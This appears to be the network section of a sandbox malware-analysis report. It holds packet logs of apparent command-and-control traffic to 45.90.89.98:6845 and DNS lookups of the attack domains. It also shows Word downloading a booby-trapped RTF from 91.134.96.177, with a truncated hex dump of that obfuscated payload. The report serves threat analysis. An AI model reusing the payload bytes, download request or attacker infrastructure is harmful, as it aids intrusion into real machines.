Sep 30, 2024 16:24:40.589912891 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589925051 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589926958 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.589935064 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589946032 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589956045 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.589957952 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.589978933 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.590003967 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.590018034 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.590018988 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.590029955 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.590092897 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.592361927 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.617487907 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617513895 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617566109 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.617605925 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617671013 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617683887 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617708921 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617712021 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.617750883 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617753029 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.617762089 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617773056 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617794037 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617796898 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.617805958 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617827892 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617830992 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.617839098 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617861986 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617862940 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.617872953 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617889881 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617901087 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.617903948 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.617932081 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618216038 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618244886 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618254900 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618256092 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618288994 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618472099 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618482113 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618499041 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618510962 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618515015 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618521929 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618532896 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618544102 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618546009 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618555069 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618570089 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618573904 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618585110 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618592978 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618604898 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618617058 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618632078 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618652105 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618801117 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618812084 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618824005 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618834972 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618844986 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618854046 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618855000 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618861914 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618874073 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618885040 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618889093 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618896961 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618907928 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618921041 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618925095 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618935108 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618941069 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618946075 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618956089 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618971109 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.618973017 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618985891 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618995905 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.618998051 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.619012117 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.619019985 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.619024038 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.619039059 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.619048119 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.619074106 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.619081974 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.620187044 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.658576012 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.658613920 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.658626080 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.658637047 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.658648014 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.658660889 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.658674955 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.658699036 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.658715963 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.658760071 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.660686970 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.660744905 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.660754919 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.660804033 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.660835981 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.660846949 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.660857916 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.660868883 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:40.660881996 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:40.660900116 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:48.206398010 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:48.211446047 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:48.211523056 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:48.211524963 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:48.211566925 CEST | 49175 | 6845 | 192.168.2.22 | 45.90.89.98
Sep 30, 2024 16:24:48.216414928 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:48.216428041 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
Sep 30, 2024 16:24:48.216476917 CEST | 6845 | 49175 | 45.90.89.98 | 192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216483116 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216516972 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216552019 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.216593981 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221323967 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221365929 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221384048 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221431017 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221602917 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221611977 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221620083 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221636057 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221643925 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.221996069 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:48.226443052 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.226455927 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.226543903 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.227164984 CEST68454917545.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:48.227225065 CEST491756845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:52.283937931 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:24:52.285682917 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:24:52.290596008 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:22.984828949 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:22.986370087 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:25:22.991338015 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:44.652101040 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:45.010564089 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:45.618968010 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:46.820199966 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:49.316179991 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:25:53.756179094 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:53.757627010 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:25:53.762523890 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:25:54.120981932 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:26:03.808603048 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                                                Sep 30, 2024 16:26:05.467186928 CEST4916980192.168.2.2291.134.96.177
                                                                                                                                                                                                Sep 30, 2024 16:26:28.211039066 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:26:28.212412119 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:26:28.218127012 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:26:59.028350115 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:26:59.031954050 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:26:59.036906958 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:27:29.840702057 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:27:29.846338987 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:27:29.852514982 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:28:00.723208904 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:28:00.726449013 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:28:00.733392954 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:28:31.610605955 CEST68454917445.90.89.98192.168.2.22
                                                                                                                                                                                                Sep 30, 2024 16:28:31.612801075 CEST491746845192.168.2.2245.90.89.98
                                                                                                                                                                                                Sep 30, 2024 16:28:31.617768049 CEST68454917445.90.89.98192.168.2.22
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Sep 30, 2024 16:24:07.809972048 CEST | 192.168.2.22 | 8.8.8.8 | 0x2745 | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:10.514309883 CEST | 192.168.2.22 | 8.8.8.8 | 0xdbf0 | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:10.531833887 CEST | 192.168.2.22 | 8.8.8.8 | 0xc91a | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:15.172908068 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:15.205696106 CEST | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:17.548057079 CEST | 192.168.2.22 | 8.8.8.8 | 0xb6ec | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:17.563815117 CEST | 192.168.2.22 | 8.8.8.8 | 0xd97e | Standard query (0) | og1.in | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:32.630136967 CEST | 192.168.2.22 | 8.8.8.8 | 0xe605 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:37.024596930 CEST | 192.168.2.22 | 8.8.8.8 | 0xf864 | Standard query (0) | maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:38.636948109 CEST | 192.168.2.22 | 8.8.8.8 | 0x3ef | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Sep 30, 2024 16:24:07.830305099 CEST | 8.8.8.8 | 192.168.2.22 | 0x2745 | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:07.830305099 CEST | 8.8.8.8 | 192.168.2.22 | 0x2745 | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:10.530066013 CEST | 8.8.8.8 | 192.168.2.22 | 0xdbf0 | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:10.530066013 CEST | 8.8.8.8 | 192.168.2.22 | 0xdbf0 | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:10.541604042 CEST | 8.8.8.8 | 192.168.2.22 | 0xc91a | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:10.541604042 CEST | 8.8.8.8 | 192.168.2.22 | 0xc91a | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:15.188206911 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:15.188206911 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:15.225506067 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:15.225506067 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:17.561928988 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6ec | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:17.561928988 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6ec | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:17.571351051 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | og1.in | | 172.67.216.244 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:17.571351051 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | og1.in | | 104.21.78.54 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:32.637216091 CEST | 8.8.8.8 | 192.168.2.22 | 0xe605 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:32.637216091 CEST | 8.8.8.8 | 192.168.2.22 | 0xe605 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:32.637216091 CEST | 8.8.8.8 | 192.168.2.22 | 0xe605 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:32.637216091 CEST | 8.8.8.8 | 192.168.2.22 | 0xe605 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:37.031922102 CEST | 8.8.8.8 | 192.168.2.22 | 0xf864 | No error (0) | maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro | | 45.90.89.98 | A (IP address) | IN (0x0001) | false |
| Sep 30, 2024 16:24:38.647865057 CEST | 8.8.8.8 | 192.168.2.22 | 0x3ef | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                                                                • og1.in
                                                                                                                                                                                                • raw.githubusercontent.com
                                                                                                                                                                                                • 91.134.96.177
                                                                                                                                                                                                • geoplugin.net
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.22 | 49169 | 91.134.96.177 | 80 | 3272 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 30, 2024 16:24:21.634495974 CEST497OUTGET /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Host: 91.134.96.177
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250706911 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Mon, 30 Sep 2024 14:24:22 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 06:43:59 GMT
                                                                                                                                                                                                ETag: "1c3d2-62350879de951"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 115666
                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: application/msword
                                                                                                                                                                                                Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 32 6e 54 55 59 51 47 4b 5a 30 79 38 64 63 76 44 70 73 6e 70 58 54 38 69 56 75 78 34 46 59 6d 65 58 70 6f 42 47 70 4e 79 61 31 66 71 37 47 63 44 65 36 42 58 71 46 6c 77 51 4e 76 34 54 38 48 4a 77 4e 70 36 5a 6a 47 62 77 4a 6c 62 6a 6e 75 63 52 62 77 4d 33 58 37 48 46 4f 55 57 64 37 72 32 50 7a 76 31 37 39 6f 55 6c 51 66 42 38 45 6a 6a 4e 77 55 35 71 4d 34 31 37 55 34 42 51 57 50 37 36 42 57 6a 59 39 76 75 44 73 6d 4d 78 63 79 71 63 64 44 54 71 6c 5a 52 43 42 35 70 53 4f 6f 6f 42 55 30 30 59 6a 56 39 54 44 57 76 73 79 58 43 4a 43 59 4b 6a 6d 55 6f 66 31 75 47 7d 0d 0d 7b 5c 31 37 34 38 35 31 31 31 35 39 31 5b 32 32 35 31 2b 29 3b 35 2f 21 40 2a 3a 34 5f 5b 3f 39 60 39 b5 27 7c 3e 21 39 3c 21 5e 33 25 2b 5e 7c 7e 25 2a 3f 2b 32 3c 37 25 3a b0 60 3f 5d 31 7c 3f 3d 2c 38 25 a7 7e 23 2f 3a 25 3f 3c 3c 21 7c 24 36 25 2b 3f 39 25 21 32 3f b0 25 3d 5f 5d 31 31 27 27 39 3f 33 37 25 38 7e 37 3f 24 2f 2c 23 b5 26 2b 32 3a 2f 29 5f a7 27 3b 2d 5d 7c 3f 3d 21 2a 29 3f 2a 28 5d [TRUNCATED]
                                                                                                                                                                                                Data Ascii: {\rtf1{\*\2nTUYQGKZ0y8dcvDpsnpXT8iVux4FYmeXpoBGpNya1fq7GcDe6BXqFlwQNv4T8HJwNp6ZjGbwJlbjnucRbwM3X7HFOUWd7r2Pzv179oUlQfB8EjjNwU5qM417U4BQWP76BWjY9vuDsmMxcyqcdDTqlZRCB5pSOooBU00YjV9TDWvsyXCJCYKjmUof1uG}{\17485111591[2251+);5/!@*:4_[?9`9'|>!9<!^3%+^|~%*?+2<7%:`?]1|?=,8%~#/:%?<<!|$6%+?9%!2?%=_]11''9?37%8~7?$/,#&+2:/)_';-]|?=!*)?*(]&44`1*8?:@<_$,26=#6#`?^~$59></%~%%=*?4@.4=??24~?_=%).^_^[*1|7#$*$%>78.$/.)7_]?,284)0+`/7*6>_+~55>*9;@=2|)&%6;?@/~/?=,?313$!~94#3[[~4_(?]:@~[`%##>!!`7$!+#&,~=[#?*'_];^3][6!@|?;%8<@<])8.#-82>='_/7766:`8*_*`,~?<82:[<%?%?/._2;[/?7?*40,^.!?(@]%4^!:~%-@(4'58!3:)(+=?-24?^?;?=?`_[*$;^_;;8#.7='6:_**/56-;=%]58^,#<*.%/*%8)(&#($%||!-.|8|`)0'!8.?[@(%&%;4-;%??[[96`=/077<.3##(**7??)1=31'%5*54~]`[0%&<$]?0;%2,)%:6$`[+&2?%2[~7]]?_9$$8?]??_[5%)$05?.6%3|6.3?|@~-::=<?;%|50;0^?29[??_?_:#!(%9[*'@51/2`?~!+/*.!-]?)^`??])=&#'*@6?,[=/~?@?^?279;5=&'??'`|@;
                                                                                                                                                                                                Sep 30, 2024 16:24:22.250788927 CEST1236INData Raw: 32 5b 31 5e 34 2a 7c 30 5d 5b 37 60 33 25 24 3f 2e a7 37 28 30 3c 5d 5e a7 38 21 31 38 26 5b 3b 2c 7e 32 34 33 2d 3a 34 39 21 27 23 21 b5 25 30 40 28 2b b0 38 2e 3b 32 60 3f 3f 29 3f 3e 30 32 23 2a 36 25 3f 26 3f 2c 40 5e 2d 37 5d 29 39 26 2e 3e
